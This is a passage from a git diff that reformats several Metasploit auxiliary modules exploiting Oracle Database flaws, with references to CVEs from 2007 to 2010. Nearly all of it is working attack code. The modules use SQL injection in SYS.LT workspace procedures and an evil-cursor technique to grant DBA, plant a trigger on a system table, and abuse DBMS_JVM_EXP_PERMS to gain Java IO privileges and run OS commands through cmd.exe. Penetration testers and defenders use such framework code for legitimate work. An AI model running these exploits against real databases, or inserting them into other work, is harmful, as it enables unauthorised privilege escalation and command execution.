=> [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'References' => - [ + }, + 'Author' => [ 'Sh2kerr ' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3979' ], [ 'OSVDB', '51354' ], [ 'URL', 'http://www.securityfocus.com/archive/1/500061' ], [ 'URL', 'http://www.ngssoftware.com/' ], ], - 'DisclosureDate' => '2009-01-13')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']) - ]) + 'DisclosureDate' => '2009-01-13', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) + + register_options( + [ + OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), + OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']) + ] + ) end def run - name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function1 = %Q| + name1 = Rex::Text.rand_text_alpha_upper(1..10) + name2 = Rex::Text.rand_text_alpha_upper(1..10) + rand1 = Rex::Text.rand_text_alpha_upper(1..10) + rand2 = Rex::Text.rand_text_alpha_upper(1..10) + rand3 = Rex::Text.rand_text_alpha_upper(1..10) + rand4 = Rex::Text.rand_text_alpha_upper(1..10) + rand5 = Rex::Text.rand_text_alpha_upper(1..10) + + function1 = %( CREATE OR REPLACE PROCEDURE #{name1} AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; END; - | - + ) - function2 = %Q| + function2 = %| CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is PRAGMA AUTONOMOUS_TRANSACTION; STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10); @@ -64,20 +72,19 @@ def run END; | - prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)" + prepare = "create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)" - exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\"" + exploiting1 = "drop table \"O' and 1=#{datastore['USER']}.#{name2}--\"" exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')" - fun1 = Rex::Text.encode_base64(function1) + fun1 = Rex::Text.encode_base64(function1) fun2 = Rex::Text.encode_base64(function2) - prp = Rex::Text.encode_base64(prepare) + prp = Rex::Text.encode_base64(prepare) exp1 = Rex::Text.encode_base64(exploiting1) exp2 = Rex::Text.encode_base64(exploiting2) - - sql = %Q| + sql = %| DECLARE #{rand1} VARCHAR2(32767); #{rand2} VARCHAR2(32767); @@ -103,10 +110,7 @@ def run DROP FUNCTION #{name2}; | - print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sql) - - end end diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index f680953fd03b..b94de9da4cf0 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -7,57 +7,65 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution', + 'Description' => %q{ This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows - any user with create session privilege to grant themselves java IO privileges. - Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only) - }, - 'Author' => [ 'sid[at]notsosecure.com' ], - 'License' => MSF_LICENSE, - 'References' => - [ + any user with create session privilege to grant themselves java IO privileges. + Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only) + }, + 'Author' => [ 'sid[at]notsosecure.com' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2010-0866'], [ 'OSVDB', '62184'], [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ], [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ], ], - 'DisclosureDate' => '2010-02-01')) + 'DisclosureDate' => '2010-02-01', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) register_options( [ - OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), - ]) + OptString.new('CMD', [ false, 'CMD to execute.', 'echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt']), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + Rex::Text.rand_text_alpha(1..10) - - package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + - "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" - package1 << "<" << ">','execute','ENABLED' from dual;" + - "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + - "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" + - "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + - "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" + - "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package1 = 'DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;' \ + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" + package1 << '<' << ">','execute','ENABLED' from dual;" \ + 'BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;' + package2 = 'DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;' \ + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" \ + 'BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;' + package3 = 'DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;' \ + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" \ + 'BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;' os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual" begin - print_status("Attempting to grant JAVA IO Privileges") + print_status('Attempting to grant JAVA IO Privileges') prepare_exec(package1) prepare_exec(package2) prepare_exec(package3) - print_status("Attempting to execute OS Code") + print_status('Attempting to execute OS Code') prepare_exec(os_code) - rescue => e + rescue StandardError => e print_error("Error: #{e.class} #{e}") end end diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index e795f0417a08..27717f23a54e 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -7,46 +7,54 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution', - 'Description' => %q{ - This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows + super( + update_info( + info, + 'Name' => 'Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution', + 'Description' => %q{ + This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. - Identified by David Litchfield. Works on 11g R1 and R2 (Windows only). - }, - 'Author' => [ 'sid[at]notsosecure.com' ], - 'License' => MSF_LICENSE, - 'References' => - [ + Identified by David Litchfield. Works on 11g R1 and R2 (Windows only). + }, + 'Author' => [ 'sid[at]notsosecure.com' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2010-0866'], [ 'OSVDB', '62184'], [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ], [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ], ], - 'DisclosureDate' => '2010-02-01')) + 'DisclosureDate' => '2010-02-01', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) register_options( [ - OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), - ]) + OptString.new('CMD', [ false, 'CMD to execute.', 'echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt']), + ] + ) end def run - return if not check_dependencies - - name = Rex::Text.rand_text_alpha(rand(10) + 1) + return if !check_dependencies + Rex::Text.rand_text_alpha(1..10) package = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" - package << "<" << ">','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package << '<' << ">','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" os_code = "select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe /c #{datastore['CMD']}')from dual" begin - print_status("Attempting to grant JAVA IO Privileges") + print_status('Attempting to grant JAVA IO Privileges') prepare_exec(package) - print_status("Attempting to execute OS Code") + print_status('Attempting to execute OS Code') prepare_exec(os_code) - rescue => e + rescue StandardError => e print_error("Error: #{e.class} #{e}") end end diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 3e6459006b00..7b486321fcb7 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -7,33 +7,42 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE', - 'Description' => %q{ - This module exploits an sql injection flaw in the COMPRESSWORKSPACE - procedure of the PL/SQL package SYS.LT. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'CG' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE', + 'Description' => %q{ + This module exploits an sql injection flaw in the COMPRESSWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3982'], [ 'OSVDB', '49324'], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ] ], - 'DisclosureDate' => '2008-10-13')) + 'DisclosureDate' => '2008-10-13', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) cruft = Rex::Text.rand_text_alpha_upper(1) function = " @@ -53,22 +62,21 @@ def run clean = "DROP FUNCTION #{cruft}" - print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...") + print_status('Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...') - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) begin prepare_exec(package1) prepare_exec(package2) - rescue => e - if ( e.to_s =~ /No Data/ ) + rescue StandardError => e + if (e.to_s =~ /No Data/) print_status("Removing function '#{cruft}'...") prepare_exec(clean) else return end end - end end diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 6931a33a45c8..79d9334d7aa8 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -7,51 +7,60 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', + 'Description' => %q{ This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007. - }, - 'Author' => ['CG'], - 'License' => MSF_LICENSE, - 'References' => - [ + }, + 'Author' => ['CG'], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2007-5511'], [ 'OSVDB', '40079'], [ 'BID', '26098' ], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'], ], - 'DisclosureDate' => '2007-10-17')) + 'DisclosureDate' => '2007-10-17', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - p = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + p = Rex::Text.rand_text_alpha_upper(1..10) - cursor = <<-EOF -DECLARE -#{p} NUMBER; -BEGIN -#{p} := DBMS_SQL.OPEN_CURSOR; -DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); -SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); -END; -EOF + cursor = <<~EOF + DECLARE + #{p} NUMBER; + BEGIN + #{p} := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); + SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); + END; + EOF begin - print_status("Sending Evil Cursor and SQLI...") + print_status('Sending Evil Cursor and SQLI...') prepare_exec(cursor) - rescue => e + rescue StandardError return end end diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 661da55f3d7c..cc3824f344ea 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -7,38 +7,47 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE', - 'Description' => %q{ - This module exploits a sql injection flaw in the MERGEWORKSPACE - procedure of the PL/SQL package SYS.LT. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'CG' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE', + 'Description' => %q{ + This module exploits a sql injection flaw in the MERGEWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3983'], [ 'OSVDB', '49325'], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ] ], - 'DisclosureDate' => '2008-10-22')) + 'DisclosureDate' => '2008-10-22', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + rand1 = Rex::Text.rand_text_alpha_upper(1..10) + rand2 = Rex::Text.rand_text_alpha_upper(1..10) + rand3 = Rex::Text.rand_text_alpha_upper(1..10) cruft = Rex::Text.rand_text_alpha_upper(1) function = " @@ -52,23 +61,23 @@ def run RETURN '#{cruft}'; END;" - package1 = %Q| + package1 = %| BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - package2 = %Q| + package2 = %| BEGIN SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package1) + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) tres = Rex::Text.encode_base64(package2) - sql = %Q| + sql = %| DECLARE #{rand1} VARCHAR2(32767); #{rand2} VARCHAR2(32767); @@ -86,15 +95,14 @@ def run clean = "DROP FUNCTION #{cruft}" # Try first, if it's good.. keep doing the dance. - print_status("Attempting sql injection on SYS.LT.MERGEWORKSPACE...") + print_status('Attempting sql injection on SYS.LT.MERGEWORKSPACE...') begin prepare_exec(sql) - rescue => e + rescue StandardError return end print_status("Removing function '#{cruft}'...") prepare_exec(clean) - end end diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 31a0afc161be..a2c944f5306a 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -7,35 +7,44 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE', - 'Description' => %q{ - This module exploits a sql injection flaw in the REMOVEWORKSPACE - procedure of the PL/SQL package SYS.LT. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE', + 'Description' => %q{ + This module exploits a sql injection flaw in the REMOVEWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'Sh2kerr ' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3984' ], [ 'OSVDB', '49326'] ], - 'DisclosureDate' => '2008-10-13')) + 'DisclosureDate' => '2008-10-13', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + rand1 = Rex::Text.rand_text_alpha_upper(1..10) + rand2 = Rex::Text.rand_text_alpha_upper(1..10) + rand3 = Rex::Text.rand_text_alpha_upper(1..10) cruft = Rex::Text.rand_text_alpha_upper(1) function = " @@ -49,23 +58,23 @@ def run RETURN '#{cruft}'; END;" - package1 = %Q| + package1 = %| BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - package2 = %Q| + package2 = %| BEGIN SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package1) + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) tres = Rex::Text.encode_base64(package2) - sql = %Q| + sql = %| DECLARE #{rand1} VARCHAR2(32767); #{rand2} VARCHAR2(32767); @@ -83,15 +92,14 @@ def run clean = "DROP FUNCTION #{cruft}" # Try first, if it's good.. keep doing the dance. - print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...") + print_status('Attempting sql injection on SYS.LT.REMOVEWORKSPACE...') begin prepare_exec(sql) - rescue => e + rescue StandardError return end print_status("Removing function '#{cruft}'...") prepare_exec(clean) - end end diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 7574574284db..4663e2c6796b 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -7,37 +7,46 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE', - 'Description' => %q{ - This module exploits a sql injection flaw in the ROLLBACKWORKSPACE - procedure of the PL/SQL package SYS.LT. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE', + 'Description' => %q{ + This module exploits a sql injection flaw in the ROLLBACKWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2009-0978' ], [ 'OSVDB', '53734'], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ], ], - 'DisclosureDate' => '2009-05-04')) + 'DisclosureDate' => '2009-05-04', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + rand1 = Rex::Text.rand_text_alpha_upper(1..10) + rand2 = Rex::Text.rand_text_alpha_upper(1..10) + rand3 = Rex::Text.rand_text_alpha_upper(1..10) + cruft = Rex::Text.rand_text_alpha_upper(1..5) function = " CREATE OR REPLACE FUNCTION #{cruft} @@ -50,23 +59,23 @@ def run RETURN '#{cruft}'; END;" - package1 = %Q| + package1 = %| BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - package2 = %Q| + package2 = %| BEGIN SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package1) + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) tres = Rex::Text.encode_base64(package2) - sql = %Q| + sql = %| DECLARE #{rand1} VARCHAR2(32767); #{rand2} VARCHAR2(32767); @@ -83,7 +92,7 @@ def run clean = "DROP FUNCTION #{cruft}" - print_status("Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...") + print_status('Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...') prepare_exec(sql) print_status("Removing function '#{cruft}'...") prepare_exec(clean)